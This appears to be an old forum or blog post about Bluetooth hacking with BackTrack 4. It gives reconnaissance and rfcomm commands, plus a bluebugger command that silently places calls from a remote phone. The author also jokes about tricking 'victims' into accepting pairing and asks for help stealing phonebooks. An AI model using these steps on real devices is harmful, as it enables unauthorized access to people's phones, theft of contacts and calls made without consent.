Bluetooth hacking on BT4
For your case this is not a tutorial on hacking bluetooth. Am just looking for ideas from other people who have a deeper understanding in bluetooth. You can visit the sites below for basic training;-
http://www.youtube.com/watch?v=PvxccqVC4Oo
http://www.youtube.com/watch?v=6z1d3sXD9RU
You can also join the facebook hacking bluetooth page for more ideas:-
http://www.facebook.com/pages/Hacking-Bluetooth/273923608586?ref=ts
What do i have on my box
First, i wrote a script to configure my Bluetooth device so that i wouldn't have to keep typing every time i need to set it up. This is what it looks like
#!/bin/sh
mkdir -p 666 /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/bluetooth/rfcomm0 c 216 0
# Firing up the bluetooth device#
hciconfig -a hci0 up
hciconfig -a hci0 class 0x500204
hciconfig -a hci0 lm accept, master;
hciconfig -a hci0 lp rswitch,hold,sniff,park;
hciconfig -a hci0 auth enable
hciconfig -a hci0 encrypt enable
hciconfig -a hci0 name ronsoft
Incase you want to change it by the file you can navigate to the bluetooth dir nano /etc/bluetooth/
Here you can have control of even more options by playing around with the conf files.
> rfcomm.conf
> network.conf
> main.conf
Footprinting the remote device
Scan for devices:hcitool scan hci0
hcitool info xx:xx:xx:xx:xx:xx
You can also ping the device to know it's rangel2ping xx:xx:xx:xx:xx:xx
sdptools browse --l2cap
This will list all service, channels and alot info about the remote device. You may wonder how this could help, but this is the gold mine of bluetooth hacking. Take a pen and paper and note down the important services with their channel numbers, record handles and value attributtes. Famous ports:-
DUN - Dial up network
OBEX - Object exchange
OPUSH - Object push for file trasfer
SAP - Sim access
Update you sdp db
sdptool add --handle= --channel=
sdptool add --handle = 0x10013 --channel = 4 SAP
Now the stress starts from here,. Trying to bind and then connect the rfcomm to the remote device.
rfcomm
rfcommrfcomm bind /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm connect /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm show
With the above code, my box turns into an error box. First i get the signals to the remote bluetooth phone but nothing can happen untill i accept the request from the phone. Well, the victim may by chance just hit the accept button without knowing..hahahahaaa....! After establishing connection the remote device needs a 16 digit number in order to complete the pairing!
Now guy, take the turn and tell me. How do you deal with this in your own world?
Tried bluesnarfer and bluebugger but still couldn't get so far. The funny thing is that i can make a call through to the remote device but i can't pull it's phonebook!
bluebugger -m Ron -c 7 -a xx:xx:xx:xx:xx:xx dail 9818303531
The phone goes through successfully even without making prompts accept from the screen light blink
These are some of the errors i get when i try it with bluesnarfer and more bluebugger.
bt_rfcomm_config failed
unable to create rfcomm connect
open /dev/bluetooth/rfcomm/0 connection refused
Can't connect RFCOMM socket:
tcget attr failed: Input / output error
bt_rfcomm_config() failed
rfcomm error connection 216 connection fail
RFCOMMDEV / bluetooth/ not connected.
Guys, if you are good enough with bluetooth please, help out. No one has yet attempted to find a solution to this question "I assume!" Because there are alot of questions but few answers.
Reference:
http://www.palowireless.com/infotooth/tutorial/rfcomm.asp